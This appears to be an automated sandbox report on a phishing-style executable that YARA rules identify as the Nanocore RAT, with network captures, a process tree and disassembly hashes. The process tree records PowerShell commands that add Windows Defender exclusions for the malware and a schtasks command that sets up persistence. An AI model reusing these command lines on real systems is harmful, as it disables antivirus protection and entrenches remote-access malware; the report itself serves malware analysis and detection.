                      Jul 20, 2021 08:15:13.381097078 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.391231060 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.391284943 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.391463995 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.401159048 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.401357889 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.411272049 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.411330938 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.411454916 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.421226978 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.421334028 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.421403885 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.431205988 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.440951109 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.440989971 CEST160449746194.5.98.120192.168.2.3

                      System Behavior

                      General

                      Start time:08:13:02
                      Start date:20/07/2021
                      Path:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
                      Imagebase:0x1a0000
                      File size:1084928 bytes
                      MD5 hash:2F286CD817B368E8A747E8F0D8F28825
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:low

                      General

                      Start time:08:13:34
                      Start date:20/07/2021
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
                      Imagebase:0x840000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Start time:08:13:34
                      Start date:20/07/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6b2800000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:08:13:35
                      Start date:20/07/2021
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
                      Imagebase:0x840000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Start time:08:13:35
                      Start date:20/07/2021
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'
                      Imagebase:0x250000
                      File size:185856 bytes
                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:08:13:35
                      Start date:20/07/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6b2800000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:08:13:36
                      Start date:20/07/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6b2800000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:08:13:37
                      Start date:20/07/2021
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
                      Imagebase:0x840000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Start time:08:13:38
                      Start date:20/07/2021
                      Path:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      Imagebase:0xa50000
                      File size:1084928 bytes
                      MD5 hash:2F286CD817B368E8A747E8F0D8F28825
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, Author: Florian Roth
                      Reputation:low

                      General

                      Start time:08:13:40
                      Start date:20/07/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6b2800000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Code Analysis

                        Executed Functions

                        • Opcode Fuzzy Hash: 69c360be880a8afa52cd776073406450b8c6b62ba3bf464968d5c7fe65e6fd75
                        • Instruction Fuzzy Hash: 7C414D74A002099FCB54DF69D958AAEBBB5BF44314F09802AE816EB3A1CB74DC46CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cbaf7fff46029daa5a08624a87055969b6c428a924870bb1d7dd8a400d42822
                        • Instruction ID: 3677eb91731aab2df58bd004e75b6584f53815579055ee0d0aa5264c4c3da8d8
                        • Opcode Fuzzy Hash: 9cbaf7fff46029daa5a08624a87055969b6c428a924870bb1d7dd8a400d42822
                        • Instruction Fuzzy Hash: 83313479B005155F8F25EBACD4105AEBFBAAFDA12170484ABE109CF760CA30DC42C796
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6171adc7ddd892c3d8b098fd11606481f41c8b46d09de2325bc9906dfaf3b773
                        • Instruction ID: 44d6003f25c44a9a5dd3d63d5561619741e288d5a125b271d1460faa1158258f
                        • Opcode Fuzzy Hash: 6171adc7ddd892c3d8b098fd11606481f41c8b46d09de2325bc9906dfaf3b773
                        • Instruction Fuzzy Hash: 2F3150363145149FC705DB6DE884CA9BBA9EF9932172581A7E609CF361CB32EC02CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd26392b7bbbcd03f63ebfa98363380ed2dbe2c64bd6c2309fa8152ff62c839d
                        • Instruction ID: afeb0e81e7851615168fc42228a08b40699e09fe520d7108be817ab464ee5ebf
                        • Opcode Fuzzy Hash: fd26392b7bbbcd03f63ebfa98363380ed2dbe2c64bd6c2309fa8152ff62c839d
                        • Instruction Fuzzy Hash: A2316F39300A118FC714EB69E49492EB7E6EFC961531544ABE51ACFB61DF30EC01CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e530e57b49df93d3216d06d253a01827d9c08cc70acf60753f54e4eab4247c7f
                        • Instruction ID: 3647174d722a12b96e31ab882e8855af4fd53e1fa8d614a2b3971b097c378132
                        • Opcode Fuzzy Hash: e530e57b49df93d3216d06d253a01827d9c08cc70acf60753f54e4eab4247c7f
                        • Instruction Fuzzy Hash: 58417E78B007058FC714EFA8D49596EB7F2FF88200B10886AE916EB365DB70EC45CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e052c8b86786cc561340e3861b87284432f187ec2297ecc5dfd2bdfd8e02bb1
                        • Instruction ID: c536cc18394d39d0b2c08955ca287266f63d39cbd972f57f13e2b10c0457eaac
                        • Opcode Fuzzy Hash: 7e052c8b86786cc561340e3861b87284432f187ec2297ecc5dfd2bdfd8e02bb1
                        • Instruction Fuzzy Hash: E1319E79700A258FC714DB68D8A4AAE73B2FF89214B1144AAE506CF3B5DF34DC01CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9a2ee240c0e817e7f70ccb5ac98e2c606594bcd883381650f8ed281497b72bef
                        • Instruction ID: 63f7d1b082209e35ef0611d8dd07e4ee13926d90bacf9dd2d98497e90c45228f
                        • Opcode Fuzzy Hash: 9a2ee240c0e817e7f70ccb5ac98e2c606594bcd883381650f8ed281497b72bef
                        • Instruction Fuzzy Hash: B5317878700A248FC714EB69C8A4A6A73A6FF89218B1144A9E506CF3B5DF34EC01CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e550c91f5c9b28da6f8b32df954ad58444ccffdc1aab6c1e459ca68aa2bb241a
                        • Instruction ID: fd6c6537e558b9609d079489a708560c15351cfb43ba28f4b15f6a1e4e61556c
                        • Opcode Fuzzy Hash: e550c91f5c9b28da6f8b32df954ad58444ccffdc1aab6c1e459ca68aa2bb241a
                        • Instruction Fuzzy Hash: 6621A078B046058FC710EFA8D895AAEB7F2EF89200B10496AE546DB361DB70EC05CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8007ce5f3b147559f03aa1a9bace9917a7fdcdc4f3e86393257dd912e2c9212
                        • Instruction ID: d186704898368ce2532780440cfcffbe013c0d5ea20b18f9d13020de319de7aa
                        • Opcode Fuzzy Hash: e8007ce5f3b147559f03aa1a9bace9917a7fdcdc4f3e86393257dd912e2c9212
                        • Instruction Fuzzy Hash: 0121F335B046158FCB15EF69E84497FB7EAEFD4315B05482AE906CB341DB70EC029BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff44a6fff50e0b22c8ff1860b1018fe3282bb7e7689134d031ed0b7e121cbaa3
                        • Instruction ID: 613421f652bd78369a4508209aa94ae812e472ea9fa2751db3f6899ce3bffddd
                        • Opcode Fuzzy Hash: ff44a6fff50e0b22c8ff1860b1018fe3282bb7e7689134d031ed0b7e121cbaa3
                        • Instruction Fuzzy Hash: F501B53170D7500FD3579B39286457ABFA6EED612070A40ABE545DF2A3DE648C068355
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f33ebe7a2a6a502748914437dd6193b64a8c00bc557be1806b246b8f10b0d159
                        • Instruction ID: 790ae7be185906adc14f6eb17364ec8b49c490be42ad4b48ed0b9e4fb6b220ac
                        • Opcode Fuzzy Hash: f33ebe7a2a6a502748914437dd6193b64a8c00bc557be1806b246b8f10b0d159
                        • Instruction Fuzzy Hash: 7011AC75704A008FC728DB6DE48492EB7F7AB99214B1E446BE106CF361CB75EC41CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04f2aec1fdf14c408c0524d5681bcc856fc27a027c5e471dc350acefe825b283
                        • Instruction ID: f8ed94b116a65d07490d443306794c782c438634314b5444aaf1d7e84c33c3f6
                        • Opcode Fuzzy Hash: 04f2aec1fdf14c408c0524d5681bcc856fc27a027c5e471dc350acefe825b283
                        • Instruction Fuzzy Hash: 461165717093809FC712DB58E8A4B997BF1DF87208B0E04DAC4C5CB663CA21AC4AC711
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848b7d1bdb350cca678d3fe320fb99805919058493d41c3217a8351c5e8ee655
                        • Instruction ID: 4838a81426dd9d6b11d066981034346ecaf38c31a6cd27a7f50084fb768149dd
                        • Opcode Fuzzy Hash: 848b7d1bdb350cca678d3fe320fb99805919058493d41c3217a8351c5e8ee655
                        • Instruction Fuzzy Hash: CC11C435B01605CFC706DF64E8559ADB7B2EF84205B2481AAD40ADF3A2DB30AE01CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5765ad58a8b3749cca77f50ecde33a8bfe93c51d9252aab63427228f805492ec
                        • Instruction ID: 68434909b9b50c5392d69fbbf1a802544a59030730095f0514c32ea58b9e5647
                        • Opcode Fuzzy Hash: 5765ad58a8b3749cca77f50ecde33a8bfe93c51d9252aab63427228f805492ec
                        • Instruction Fuzzy Hash: 18117F75200A008FC324CF6ED59490AFBF5FF596143154AAEE58ACBB22D670FC49CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 777aecb42f25f0aa3bfbecf8b119a2407d4412ad29f97dbcd50f13c0dd85a870
                        • Instruction ID: 768f1839d8e42b5d0d4321d384ce136625c11626be1bd92cb276a3f97b6e8824
                        • Opcode Fuzzy Hash: 777aecb42f25f0aa3bfbecf8b119a2407d4412ad29f97dbcd50f13c0dd85a870
                        • Instruction Fuzzy Hash: E31120343093108FC720EB28D854A6B7BFAEFC5305B14882EE0828BB52CBB5EC058F50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 49771701e7ac494ef73bbec31997dcdecf4632366de9ae7edeac59040cda7f29
                        • Instruction ID: 36e6630d3ea467a4b6a848c6ce27c954971e46eb0b94d21ac92f6d87300951b3
                        • Opcode Fuzzy Hash: 49771701e7ac494ef73bbec31997dcdecf4632366de9ae7edeac59040cda7f29
                        • Instruction Fuzzy Hash: B4112275301A118FC718DF29D588D26BBF5EF8A62531946A9E44ACBB71CB30EC02CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0add3899988130e4c9b0bb75745e8b87fc1ade71666eabb479754385790581d
                        • Instruction ID: e75cb1a40c3b3f2555c2bfb2f9c1481b05c0b47592821b9bbdd4e92614c73004
                        • Opcode Fuzzy Hash: a0add3899988130e4c9b0bb75745e8b87fc1ade71666eabb479754385790581d
                        • Instruction Fuzzy Hash: 4701D67BB042140B5714A67EA44066FB7DBDBF82B17148637FA1ACB395EE70CC119368
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7fcffbd3b4f23442c261518d0a04c5d1c5e23a2314d570b60ebdcf01a1ac4e6a
                        • Instruction ID: 3871174e2f8738ae2aa2464be6ca6fdf4a528ee54a161cf19132abbc6fa991c1
                        • Opcode Fuzzy Hash: 7fcffbd3b4f23442c261518d0a04c5d1c5e23a2314d570b60ebdcf01a1ac4e6a
                        • Instruction Fuzzy Hash: 7901A134704A148F8B04EB3DE95892EBBE6EB8921131484BAE50ACF365CF30DC05CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 898a9f912ad6fc2ff67843402545fde96b24081afeec27987607a5534a4e8cd1
                        • Instruction ID: d5c838009b5f64f400ef34ddb0ccd003aae43f4ff7a48986ffc2f0ba1216c28a
                        • Opcode Fuzzy Hash: 898a9f912ad6fc2ff67843402545fde96b24081afeec27987607a5534a4e8cd1
                        • Instruction Fuzzy Hash: D411A5357086448FC704DF3DD958D6ABBF5EB9A21131484BBE54ACB366CA31DC05DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7caf8cfde3aa6f736e7b1f3e01d5276a165d86b3bab57133d9254b0d3801b8a8
                        • Instruction ID: b0a26906613fde9db60eada76cbca876a9c8c64d8b246bb09a7b52df9c3330fa
                        • Opcode Fuzzy Hash: 7caf8cfde3aa6f736e7b1f3e01d5276a165d86b3bab57133d9254b0d3801b8a8
                        • Instruction Fuzzy Hash: 42117CB5200A008F8334CF6ED584806FBF5FF586103150AAEE58ACBB22D670FC49CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfc1171af970d6a37998d8bbcef8aa826e802e13beb8a07e033d0f91886fbeaa
                        • Instruction ID: 10ebb2315ceadc12f39d81c55488c812c8d6ba4b6fbe2640459fdf1cde33dbea
                        • Opcode Fuzzy Hash: dfc1171af970d6a37998d8bbcef8aa826e802e13beb8a07e033d0f91886fbeaa
                        • Instruction Fuzzy Hash: 1101DE353107249FC724EB29D858A6BBBFAFBC8315B00882EE5428B741CB75EC418B64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25228b5042d401729d961fa33fe596bcb3b723fe0d1d7afc0ee2112f5c363db1
                        • Instruction ID: 8324d42101c85d60833de6ad200b983d756381487ce43974b9639b5fd04f77d0
                        • Opcode Fuzzy Hash: 25228b5042d401729d961fa33fe596bcb3b723fe0d1d7afc0ee2112f5c363db1
                        • Instruction Fuzzy Hash: 0BF0AF323195548FD315CB1DF8488A9BBA5FF9437471441ABE419CB362CA619D068B94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e87c73e2009a2dc60fff7df9fbc3ba5a6384ebd59e2638f6fb7ae820db5327e4
                        • Instruction ID: b377bdd3e2116b935d98f6bce548660a6f5414c2468485a0414d83bd580fc1ff
                        • Opcode Fuzzy Hash: e87c73e2009a2dc60fff7df9fbc3ba5a6384ebd59e2638f6fb7ae820db5327e4
                        • Instruction Fuzzy Hash: 7DF06D3A3002148BC304EA7AE49095AB7A6EFC5219314847FE60A8F766DF71EC058794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422497216.000000000355D000.00000040.00000001.sdmp, Offset: 0355D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c01997a7c7314ec2bec4656d4938483a654767a55141ab3335d37e0440c38f92
                        • Instruction ID: 3eb0d245014e545e188c03e1a7d151d0d1a71bcf1f1731ca89cebc9b121aa049
                        • Opcode Fuzzy Hash: c01997a7c7314ec2bec4656d4938483a654767a55141ab3335d37e0440c38f92
                        • Instruction Fuzzy Hash: 9D01406240D3C45FD7128B259CA4752BFB8EF43224F1980DBED848F2A7D2695C49C772
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54c623f93dda4839a1c4e12df556af9a58dae88205fa107463c33700fb3c9654
                        • Instruction ID: 4ce5c80933912de37240065097ff2cd143af14b860024eb0fe56722d3d753753
                        • Opcode Fuzzy Hash: 54c623f93dda4839a1c4e12df556af9a58dae88205fa107463c33700fb3c9654
                        • Instruction Fuzzy Hash: B401B075301A118FC718DF29D598D26B7F5BF8961531546ADE50ACBB31DB70EC01CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422497216.000000000355D000.00000040.00000001.sdmp, Offset: 0355D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e0107ade4ebf2eecaa1e890ca4383588b07d4e41a223a9b2f5b11792e6c8eea
                        • Instruction ID: f69fcd4e6ea9caeffa5964da2a738136b05e792c8195869c259027d7287e4a0b
                        • Opcode Fuzzy Hash: 7e0107ade4ebf2eecaa1e890ca4383588b07d4e41a223a9b2f5b11792e6c8eea
                        • Instruction Fuzzy Hash: 84018473408340AAE7209A26E894B66FBECFF41268F18845AFD055B266D379A845C6B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 861a344e2d9841a7a060687f94d5820452fe8bf94c5d36352d56097fd255c592
                        • Instruction ID: 3a1fbc36037f47823b9ae180b964627cbd93bfc68b55e686dde7e9c35283b84f
                        • Opcode Fuzzy Hash: 861a344e2d9841a7a060687f94d5820452fe8bf94c5d36352d56097fd255c592
                        • Instruction Fuzzy Hash: 32E0D8327003004F8710EB5EE484C2BB7EA9BC8525308806AE10DC7312CE60DC098791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 52b7687808298c4065ec6f83e3e754920ca1ff0b1c85e292a973bd8fcd3b4af2
                        • Instruction ID: 6fd0010c8ca28dcebc6ecd7e0cd4a1b143cc3815d91966501749c662095fc322
                        • Opcode Fuzzy Hash: 52b7687808298c4065ec6f83e3e754920ca1ff0b1c85e292a973bd8fcd3b4af2
                        • Instruction Fuzzy Hash: B3E08674A0030CEBC741EFA0E511A9DB7B6EB81245F1145E9E80EEB251EF316E009750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
